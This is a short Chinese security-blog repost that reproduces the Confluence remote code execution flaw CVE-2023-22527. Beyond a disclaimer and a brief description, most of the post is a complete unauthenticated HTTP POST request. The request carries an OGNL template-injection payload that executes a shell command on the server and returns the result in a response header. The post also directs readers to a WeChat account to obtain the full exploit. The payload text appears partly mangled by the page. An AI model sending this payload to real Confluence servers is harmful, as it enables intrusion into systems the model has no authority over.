【漏洞复现】Confluence 远程代码执行漏洞(CVE-2023-22527)

admin 2024年1月24日10:28:03评论43 views字数 899阅读2分59秒阅读模式

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

0X00 漏洞描述

Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527),该漏洞是由模板注入引起的,未经身份验证的远程攻击者可利用该漏洞构造恶意请求导致远程代码执行

【漏洞复现】Confluence 远程代码执行漏洞(CVE-2023-22527)0X01 漏洞影响

系统版本(8.0至8.5.3)上均存在该漏洞

0X02 漏洞利用

POST /template/aui/text-inline.vm HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=u0027%2b#requestu005bu0027.KEY_velocity.struts2.contextu0027u005d.internalGet(u0027ognlu0027).findValue(#parameters.x,{})%2bu0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

【漏洞复现】Confluence 远程代码执行漏洞(CVE-2023-22527)

0X03 POC及Nuclei检测

【漏洞复现】Confluence 远程代码执行漏洞(CVE-2023-22527)

【漏洞复现】Confluence 远程代码执行漏洞(CVE-2023-22527)注:关注公众号安全攻防屋回复 "CVE-2023-22527" 获取漏洞EXP

原文始发于微信公众号(安全攻防屋):【漏洞复现】Confluence 远程代码执行漏洞(CVE-2023-22527)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月24日10:28:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】Confluence 远程代码执行漏洞(CVE-2023-22527)http://cn-sec.com/archives/2424576.html

发表评论

匿名网友 填写信息